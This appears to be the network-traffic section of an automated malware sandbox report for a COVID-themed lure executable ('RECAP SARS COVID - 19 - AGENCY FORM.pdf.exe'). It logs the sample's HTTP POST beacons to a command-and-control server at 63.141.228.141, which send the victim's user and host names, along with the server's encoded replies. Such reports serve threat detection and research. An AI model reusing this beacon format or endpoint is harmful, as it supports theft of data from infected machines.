Jul 1, 2021 14:36:35.425919056 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:35.587373972 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.150140047 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151612997 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151654005 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151689053 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151710987 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151729107 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151747942 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151770115 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.151772022 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.151823044 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.152213097 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.152244091 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.158884048 CEST | 80 | 49720 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.159008026 CEST | 49720 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.326832056 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.483360052 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.483510017 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.486135960 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.641176939 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:36.641344070 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:36.798700094 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338311911 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338437080 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338485956 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338534117 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338567972 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:37.338577032 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338610888 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:37.338614941 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338654041 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338690996 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.338725090 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:37.338799953 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:37.347299099 CEST | 80 | 49721 | 63.141.228.141 | 192.168.2.3
Jul 1, 2021 14:36:37.347445965 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141
Jul 1, 2021 14:36:39.820008993 CEST | 49721 | 80 | 192.168.2.3 | 63.141.228.141

HTTP Request Dependency Graph

• 63.141.228.141

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49715 | 63.141.228.141 | 80 | C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Timestamp | kBytes transferred | Direction | Data
Jul 1, 2021 14:36:31.408982038 CEST | 1340 | OUT | POST /32.php/fn1ToJTMzu3Td HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 63.141.228.141
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FAC4DD3C
Content-Length: 190
Connection: close
Jul 1, 2021 14:36:31.564367056 CEST | 1340 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: 'ckav.ruhardz841675DESKTOP-716T771k08F9C4E9C79A3B52B3F739430KPbTq
Jul 1, 2021 14:36:32.256418943 CEST | 1344 | IN | HTTP/1.1 404 Not Found
Date: Thu, 01 Jul 2021 12:36:31 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 
20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Jul 1, 2021 14:36:32.256474972 CEST | 1345 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Jul 1, 2021 14:36:32.256511927 CEST | 1347 | IN | Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Jul 1, 2021 14:36:32.256548882 CEST | 1348 | IN | Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Jul 1, 2021 14:36:32.256587029 CEST | 1349 | IN | Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Jul 1, 2021 14:36:32.256623030 CEST | 1351 | IN | Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Jul 1, 2021 14:36:32.256659985 CEST | 1352 | IN | Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
Jul 1, 2021 14:36:32.256696939 CEST | 1353 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49717 | 63.141.228.141 | 80 | C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Timestamp | kBytes transferred | Direction | Data
Jul 1, 2021 14:36:32.663220882 CEST | 1365 | OUT | POST /32.php/fn1ToJTMzu3Td HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 63.141.228.141
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: FAC4DD3C
Content-Length: 190
Connection: close
Jul 1, 2021 14:36:32.819875956 CEST | 1365 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: 'ckav.ruhardz841675DESKTOP-716T771+08F9C4E9C79A3B52B3F739430cmtFR
Jul 1, 2021 14:36:33.568382978 CEST | 1368 | IN | HTTP/1.1 404 Not Found
Date: Thu, 01 Jul 2021 12:36:32 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 
20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:33.568468094 CEST | 1370 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:33.568520069 CEST | 1371 | IN | Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:33.568566084 CEST | 1372 | IN | Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:33.568645954 CEST | 1374 | IN | Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:33.568691969 CEST | 1375 | IN | Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:33.568737030 CEST | 1377 | IN | Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:33.568780899 CEST | 1378 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.3 | 49719 | 63.141.228.141 | 80 | C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jul 1, 2021 14:36:33.952661037 CEST | 1383 | OUT | POST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 163
                                        Connection: close
